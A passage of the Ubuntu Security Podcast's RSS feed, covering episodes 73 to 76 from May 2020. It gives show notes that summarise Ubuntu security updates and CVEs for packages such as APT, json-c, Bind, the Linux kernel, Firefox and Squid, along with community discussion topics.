<li><a href="https://ubuntu.com/security/CVE-2020-11869">CVE-2020-11869</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10702">CVE-2020-10702</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20382">CVE-2019-20382</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15034">CVE-2019-15034</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF in libslirp</li>
<li>Integer overflow in handling of ATI VGA emulation -&gt; guest to host crash</li>
</ul>
<h3 id="usn-4373-1-thunderbird-vulnerabilities-03-44">[<a href="https://usn.ubuntu.com/4373-1/">USN-4373-1</a>] Thunderbird vulnerabilities [03:44]</h3>
<ul>
<li>5 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12397">CVE-2020-12397</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12392">CVE-2020-12392</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12395">CVE-2020-12395</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12387">CVE-2020-12387</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6831">CVE-2020-6831</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>68.8.0</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-mcmanus-and-vineetha-kamath-discuss-fips-certification-for-ubuntu-18-dot-04-lts-04-10">Joe McManus and Vineetha Kamath discuss FIPS certification for Ubuntu 18.04 LTS [04:10]</h3>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E076.mp3" length="12418939" type="audio/mpeg" /><itunes:duration>12:56</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 75
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-75/</link>
          <pubDate>Fri, 22 May 2020 16:55:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>3c3059786dd7267589452b1f4ea3e9d9cb3e9990f3b29732c53c4868a7a4619ff09c074f3e5b257a2e481a7fa27c86f9ef72778829029ea20ee4ed7e7dc85338</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 75</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          In episode 75 we look at security updates for APT, json-c, Bind, the Linux
  kernel and more, plus Joe and Alex discuss recent phishing attacks and the
  Wired biopic of Marcus Hutchins.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  In episode 75 we look at security updates for APT, json-c, Bind, the Linux
  kernel and more, plus Joe and Alex discuss recent phishing attacks and the
  Wired biopic of Marcus Hutchins.
  </itunes:summary>
        <description>  In episode 75 we look at security updates for APT, json-c, Bind, the Linux
  kernel and more, plus Joe and Alex discuss recent phishing attacks and the
  Wired biopic of Marcus Hutchins.
  </description>
        <googleplay:description>  In episode 75 we look at security updates for APT, json-c, Bind, the Linux
  kernel and more, plus Joe and Alex discuss recent phishing attacks and the
  Wired biopic of Marcus Hutchins.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>In episode 75 we look at security updates for APT, json-c, Bind, the Linux
kernel and more, plus Joe and Alex discuss recent phishing attacks and the
Wired biopic of Marcus Hutchins.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>26 unique CVEs addressed</p>
<h3 id="usn-4358-1-libexif-vulnerabilities-00-44">[<a href="https://usn.ubuntu.com/4358-1/">USN-4358-1</a>] libexif vulnerabilities [00:44]</h3>
<ul>
<li>2 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12767">CVE-2020-12767</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20030">CVE-2018-20030</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Divide by zero and a CPU infinite loop (DoS) for handling crafted exif
content</li>
</ul>
<h3 id="usn-4359-1-apt-vulnerability-01-19">[<a href="https://usn.ubuntu.com/4359-1/">USN-4359-1</a>] APT vulnerability [01:19]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-3810">CVE-2020-3810</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Own ar archive handling code</li>
<li>Stack buffer OOB read for ar archive members with specially crafted
names - tried to handle spaces etc in names but if the name was all
spaces would overrun the name and read past the end of it</li>
</ul>
<h3 id="usn-4360-1-json-c-vulnerability-02-04">[<a href="https://usn.ubuntu.com/4360-1/">USN-4360-1</a>] json-c vulnerability [02:04]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12762">CVE-2020-12762</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Integer overflow -&gt; OOB write from a large json file</li>
</ul>
<h3 id="usn-4360-2-usn-4360-3-json-c-regression-02-27">[<a href="https://usn.ubuntu.com/4360-2/">USN-4360-2</a>, USN-4360-3] json-c regression [02:27]</h3>
<ul>
<li>Affecting Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)</li>
<li>Upstream fix had a bug where logic for trying to handle integer overflow
was inverted and so would cause INT_MAX (2GB) memory to be allocated</li>
<li>On machines with a small amount of memory this could exhaust all and
trigger OOM killer</li>
<li>Part of logic of the package is to trigger a rexec of upstart (which
serialises itself via libjson) - so this could cause upstart to consume
all memory, get killed to OOM killer and cause fail to boot etc</li>
<li>upstart not used as default init on xenial+ and initial update was
delayed for ESM so only a small number of users would be affected (those
running 16.04 LTS/xenial who had manually configured upstart as init)</li>
</ul>
<h3 id="usn-4361-1-dovecot-vulnerabilities-04-13">[<a href="https://usn.ubuntu.com/4361-1/">USN-4361-1</a>] Dovecot vulnerabilities [04:13]</h3>
<ul>
<li>3 CVEs addressed in Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10958">CVE-2020-10958</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10967">CVE-2020-10967</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10957">CVE-2020-10957</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>3 issues discovered by Philippe Antoine
<ul>
<li>UAF sending command is followed by a sufficient number of newlines -&gt; crash</li>
<li>Sending with empty quoted localpart or malformed NOOP commands -&gt; crash</li>
</ul>
</li>
</ul>
<h3 id="usn-4362-1-dpdk-vulnerabilities-04-47">[<a href="https://usn.ubuntu.com/4362-1/">USN-4362-1</a>] DPDK vulnerabilities [04:47]</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10726">CVE-2020-10726</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10725">CVE-2020-10725</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10724">CVE-2020-10724</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10723">CVE-2020-10723</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10722">CVE-2020-10722</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Data-plane development kit (provides TCP offloading to userspace to
accelerate package processing workloads)</li>
<li>Used by openvswitch for OpenStack software defined networking</li>
<li>Memory leak and file-descriptor leak -&gt; DoS</li>
<li>Guest to host crash via a missing check on an address in an io descriptor</li>
<li>Failure to validate key lengths</li>
<li>Integer overflow on host from guest -&gt; crash</li>
</ul>
<h3 id="usn-4367-1-linux-kernel-vulnerabilities-05-51">[<a href="https://usn.ubuntu.com/4367-1/">USN-4367-1</a>] Linux kernel vulnerabilities [05:51]</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12657">CVE-2020-12657</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11565">CVE-2020-11565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19377">CVE-2019-19377</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 kernel</li>
<li>UAF due to a race-condition in bfq block io scheduler in block subsystem</li>
<li>Bug in parsing of mount options for tmpfs -&gt; stack overflow (need root
privileges etc to specify mount options)</li>
<li>UAF in btrfs when handling a specially crafted file-system image</li>
</ul>
<h3 id="usn-4363-1-linux-kernel-vulnerabilities-06-42">[<a href="https://usn.ubuntu.com/4363-1/">USN-4363-1</a>] Linux kernel vulnerabilities [06:42]</h3>
<ul>
<li>4 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12657">CVE-2020-12657</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11669">CVE-2020-11669</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11565">CVE-2020-11565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11494">CVE-2020-11494</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 kernel</li>
<li>block io scheduler UAF</li>
<li>PowerPC specific guest -&gt; host VM crash on save / restore of authority
mask registers</li>
<li>tmpfs mount option parsing</li>
<li>Serial CAN driver did not initialise stack data so could leak stack
memory to userspace etc</li>
</ul>
<h3 id="usn-4364-1-linux-kernel-vulnerabilities-07-30">[<a href="https://usn.ubuntu.com/4364-1/">USN-4364-1</a>] Linux kernel vulnerabilities [07:30]</h3>
<ul>
<li>7 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11668">CVE-2020-11668</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11609">CVE-2020-11609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11608">CVE-2020-11608</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11565">CVE-2020-11565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11494">CVE-2020-11494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10942">CVE-2020-10942</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19060">CVE-2019-19060</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 kernel</li>
<li>USB camera drivers fail to validate device metadata -&gt; NULL ptr deref etc (crash)</li>
<li>tmpfs &amp; serial CAN above</li>
</ul>
<h3 id="usn-4368-1-linux-kernel-vulnerabilities-07-59">[<a href="https://usn.ubuntu.com/4368-1/">USN-4368-1</a>] Linux kernel vulnerabilities [07:59]</h3>
<ul>
<li>8 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12657">CVE-2020-12657</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11669">CVE-2020-11669</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11668">CVE-2020-11668</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11609">CVE-2020-11609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11608">CVE-2020-11608</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11565">CVE-2020-11565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11494">CVE-2020-11494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19769">CVE-2019-19769</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.0 gke/eom (based off Ubuntu 19.04 disco kernel)</li>
<li>block io scheduler UAF</li>
<li>ppc specific guest -&gt; host VM crash on save / restore of authority mask
registers</li>
<li>USB camera drivers fail to validate device metadata</li>
<li>tmpfs &amp; serial CAN above</li>
</ul>
<h3 id="usn-4365-1-bind-vulnerabilities-08-31">[<a href="https://usn.ubuntu.com/4365-1/">USN-4365-1</a>] Bind vulnerabilities [08:31]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8617">CVE-2020-8617</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8616">CVE-2020-8616</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DNS refelection attack via recursive resolution -
<a href="http://www.nxnsattack.com/">http://www.nxnsattack.com/</a></li>
</ul>
<h3 id="usn-4366-1-exim-vulnerability-09-14">[<a href="https://usn.ubuntu.com/4366-1/">USN-4366-1</a>] Exim vulnerability [09:14]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12783">CVE-2020-12783</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB read in Secure Password Authentication (SPA, also known as NTLM)
authenticator, could result in SPA/NTLM auth bypass</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-and-joe-discuss-recent-trends-in-phishing-attacks-and-marcus-hutchins--aka-malwaretech--09-43">Alex and Joe discuss recent trends in phishing attacks and Marcus Hutchins (aka MalwareTech) [09:43]</h3>
<ul>
<li><a href="https://www.wired.com/story/confessions-marcus-hutchins-hacker-who-saved-the-internet/">https://www.wired.com/story/confessions-marcus-hutchins-hacker-who-saved-the-internet/</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E075.mp3" length="28486126" type="audio/mpeg" /><itunes:duration>29:40</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 74
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-74/</link>
          <pubDate>Fri, 15 May 2020 16:36:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>2c79a703cf699e7143b7c01d3a81f866f97872eb6aad9604efb3f2919a8570af7cd8dd4505da621d5379bd5f3e6a69e86d313cfa6367dc9da73eac244abce8f5</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 74</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Special guest, Tim McNamara, author of Rust In Action talks all things Rust
  plus we look at security updates for Linux bluetooth firmware, OpenLDAP,
  PulseAudio, Squid and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Special guest, Tim McNamara, author of Rust In Action talks all things Rust
  plus we look at security updates for Linux bluetooth firmware, OpenLDAP,
  PulseAudio, Squid and more.
  </itunes:summary>
        <description>  Special guest, Tim McNamara, author of Rust In Action talks all things Rust
  plus we look at security updates for Linux bluetooth firmware, OpenLDAP,
  PulseAudio, Squid and more.
  </description>
        <googleplay:description>  Special guest, Tim McNamara, author of Rust In Action talks all things Rust
  plus we look at security updates for Linux bluetooth firmware, OpenLDAP,
  PulseAudio, Squid and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Special guest, Tim McNamara, author of Rust In Action talks all things Rust
plus we look at security updates for Linux bluetooth firmware, OpenLDAP,
PulseAudio, Squid and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>17 unique CVEs addressed</p>
<h3 id="usn-4351-1-linux-firmware-vulnerability-01-03">[<a href="https://usn.ubuntu.com/4351-1/">USN-4351-1</a>] Linux firmware vulnerability [01:03]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-5383">CVE-2018-5383</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Bluetooth devices failed to properly validate elliptic curve parameters
used in key exchange - remote attacker could possibly force a weak key to
be used and hence obtain the encryption key. Required changes to both the
kernel and firmware blobs - kernel was updated previously (<a href="https://ubuntusecuritypodcast.org/episode-43/">Episode 43</a>) -
this is the corresponding update for firmware</li>
</ul>
<h3 id="usn-4352-1-usn-4352-2-openldap-vulnerability-02-05">[<a href="https://usn.ubuntu.com/4352-1/">USN-4352-1</a>, USN-4352-2] OpenLDAP vulnerability [02:05]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM),
Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12243">CVE-2020-12243</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>A search filter with a large number of nested boolean expressions could
cause slapd daemon to crash via deep stack recursion - add a hard coded
limit to resolve this</li>
</ul>
<h3 id="usn-4353-1-firefox-vulnerabilities-02-46">[<a href="https://usn.ubuntu.com/4353-1/">USN-4353-1</a>] Firefox vulnerabilities [02:46]</h3>
<ul>
<li>8 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12392">CVE-2020-12392</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12396">CVE-2020-12396</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12395">CVE-2020-12395</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12394">CVE-2020-12394</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12391">CVE-2020-12391</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12390">CVE-2020-12390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12387">CVE-2020-12387</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6831">CVE-2020-6831</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>76.0</li>
<li>Displays alerts for breached passwords stored in Lockwise</li>
<li>Usual UAF, sandbox escape, buffer overflows, content security policy
bypass etc</li>
<li><a href="https://www.mozilla.org/en-US/firefox/76.0/releasenotes/">https://www.mozilla.org/en-US/firefox/76.0/releasenotes/</a></li>
</ul>
<h3 id="usn-4353-2-firefox-regression-03-34">[<a href="https://usn.ubuntu.com/4353-2/">USN-4353-2</a>] Firefox regression [03:34]</h3>
<ul>
<li>8 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12392">CVE-2020-12392</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12396">CVE-2020-12396</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12395">CVE-2020-12395</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12394">CVE-2020-12394</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12391">CVE-2020-12391</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12390">CVE-2020-12390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12387">CVE-2020-12387</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6831">CVE-2020-6831</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>76.0.1</li>
<li>Regression in behaviour related to addons - could impair their
functionality</li>
<li><a href="https://www.mozilla.org/en-US/firefox/76.0.1/releasenotes/">https://www.mozilla.org/en-US/firefox/76.0.1/releasenotes/</a></li>
</ul>
<h3 id="usn-4354-1-mailman-vulnerability-03-51">[<a href="https://usn.ubuntu.com/4354-1/">USN-4354-1</a>] Mailman vulnerability [03:51]</h3>
<ul>
<li>
<p>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)</p>
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12108">CVE-2020-12108</a> <!-- raw HTML omitted --></li>
<li>Arbitrary content injection via options login page - if the submitted</li>
</ul>
<p>email address looking invalid it would be echo&rsquo;d back to the user - and
so anything supplied as the email address would be displayed</p>
</li>
</ul>
<h3 id="usn-4355-1-pulseaudio-vulnerability-04-23">[<a href="https://usn.ubuntu.com/4355-1/">USN-4355-1</a>] PulseAudio vulnerability [04:23]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11931">CVE-2020-11931</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Snap policy module for pulseaudio - only exists in Ubuntu - is designed
to allow snapd to mediate access to pulseaudio for snaps - so if plug
pulseaudio (or audio-playback / record) interface(s) can talk to
pulseaudio but then should only be able to do certain actions - however
the policy did not restrict unloading the policy module itself so any
snap with access could unload the policy and then have unrestricted
access to pulseaudio - so could say record audio when only audio-playback
interface was connected.</li>
</ul>
<h3 id="usn-4357-1-iproute-vulnerability-05-39">[<a href="https://usn.ubuntu.com/4357-1/">USN-4357-1</a>] IPRoute vulnerability [05:39]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-20795">CVE-2019-20795</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF when listing network namespaces (ip netns list)</li>
</ul>
<h3 id="usn-4356-1-squid-vulnerabilities-05-59">[<a href="https://usn.ubuntu.com/4356-1/">USN-4356-1</a>] Squid vulnerabilities [05:59]</h3>
<ul>
<li>4 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11945">CVE-2020-11945</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18860">CVE-2019-18860</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12521">CVE-2019-12521</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12519">CVE-2019-12519</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible cache poisoning, crash or RE from malicious remote servers via
Edge Side Includes</li>
<li>Failure to properly validate hostname in cachemanager for certain
browsers -&gt; HTML injection</li>
<li>Nonce reply due to failure to properly validate Digest Authentication
nonce values</li>
</ul>
<h3 id="usn-3911-2-file-regression-06-40">[<a href="https://usn.ubuntu.com/3911-2/">USN-3911-2</a>] file regression [06:40]</h3>
<ul>
<li>Affecting Xenial (16.04 LTS), Bionic (18.04 LTS)</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-25/">Episode 25</a> - <a href="https://usn.ubuntu.com/3911-1/">USN-3911-1</a> - update for file caused a regression where the
name of the interpreter parsed by file would be truncated and so the
output would be incorrect - used sizeof(var) - but var is a char * and so
sizeof() is size of a pointer - should instead be the length of the
string - updated to use strlen(var) +1</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-talks-rust-with-tim-mcnamara-08-14">Alex talks Rust with Tim McNamara [08:14]</h3>
<ul>
<li><a href="https://tim.mcnamara.nz/">https://tim.mcnamara.nz/</a></li>
<li><a href="https://www.manning.com/books/rust-in-action">https://www.manning.com/books/rust-in-action</a></li>
<li>Offer for listeners:
<ul>
<li>40% off all Manning Products in all forms using the code: podubuntu20</li>
</ul>
</li>
<li>5 copies of Rust in Action e-book to giveaway
<ul>
<li>Send us your favourite security tools written in Rust or your thoughts
on Rust in Ubuntu to win a copy</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E074.mp3" length="44084780" type="audio/mpeg" /><itunes:duration>45:55</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 73
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-73/</link>
          <pubDate>Fri, 08 May 2020 16:33:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>c039a9d53dff1addccd7b08a29a0cffd93bea47f1168e91cf96eadc479d09b30da4127061ee5d83517e4be02f217f34bc3e70c115f23e45fd11a57b6db5b976d</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 73</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          After the recent release of Ubuntu 20.04 LTS, we look at security fixes for
  OpenJDK, CUPS, the Linux kernel, Samba and more, plus Joe and Alex discuss
  robot kits and the Kaiji botnet.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  After the recent release of Ubuntu 20.04 LTS, we look at security fixes for
  OpenJDK, CUPS, the Linux kernel, Samba and more, plus Joe and Alex discuss
  robot kits and the Kaiji botnet.
  </itunes:summary>
        <description>  After the recent release of Ubuntu 20.04 LTS, we look at security fixes for
  OpenJDK, CUPS, the Linux kernel, Samba and more, plus Joe and Alex discuss
  robot kits and the Kaiji botnet.
  </description>
        <googleplay:description>  After the recent release of Ubuntu 20.04 LTS, we look at security fixes for
  OpenJDK, CUPS, the Linux kernel, Samba and more, plus Joe and Alex discuss
  robot kits and the Kaiji botnet.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>After the recent release of Ubuntu 20.04 LTS, we look at security fixes for
OpenJDK, CUPS, the Linux kernel, Samba and more, plus Joe and Alex discuss
robot kits and the Kaiji botnet.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>86 unique CVEs addressed</p>
<h3 id="usn-4337-1-openjdk-vulnerabilities-01-21">[<a href="https://usn.ubuntu.com/4337-1/">USN-4337-1</a>] OpenJDK vulnerabilities [01:21]</h3>
<ul>
<li>13 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-2830">CVE-2020-2830</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2816">CVE-2020-2816</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2805">CVE-2020-2805</a> <!-- raw HTML omitted --></li>
